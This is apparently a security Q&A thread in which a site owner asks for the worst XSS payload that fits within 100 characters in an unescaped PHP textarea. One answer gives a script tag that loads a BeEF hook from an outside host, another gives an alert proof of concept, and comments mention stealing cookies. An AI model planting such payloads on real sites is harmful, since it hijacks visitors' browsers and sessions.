# What is the best exploit of XSS within 100 characters?

Tags: web-application, php, xss, html

I found a vulnerable php script on my website. The script allows an user input (textarea), which is not encoded by htmlspecialchars(). Therefore it is possible to add html and javascript code. The maximum allowed length of this textarea is 100 characters. What would be the worst or *best* exploit to apply in this vulnerability?

Edit: The character limitation is forced on server side by rtrim.

Comment: Not a good question here, for various reasons. However, with a bit of re-scoping and clarification, it might be of interest over at [codegolf.se]. Narrow it down to "what is the most critical compromise possible" (according to some defined scale) and it might be good here.

Comment: The question asks for the "best" which is subjective.

Answer (score 2):

This question invites subjective answers, but I would say that the payload:

```
<script src=http://1.1.1.1:3000/hook.js></script>
```

In conjunction with the [BeEF exploit framework](http://beefproject.com/) would be close to the most damage you could do because it provides a way to launch a number of other attacks.

Obviously you would replace the IP address I provided with one of your own that points to an instance of BeEF.

Another thing to look at - can you bypass the 100 character limit?  If this limit is enforced on the client side then it's not really enforced at all.

Answer (score 1):

An easy exploit is simply:

```
<script>alert("Hacked!");</script>
```

Similar `alert` boxes are often used as a demonstration of an XSS exploit because they are so easy to see and understand.

Comment: Hi, yeah I thought about this already. But this is not really a thread to my server, isn't it? Is there any malicious code within 100 characters?

Comment: @zarathustra, XSS is not typically a threat to your server.  Do you understand what XSS is?

Comment: @AbeMiessler Yes, I think so. I mean something like read cookie and send it to url or something like that!

Comment: Yeah, XSS is good for that.  Typically it's an attack on users and not on the server itself.  Just wanted to clarify :)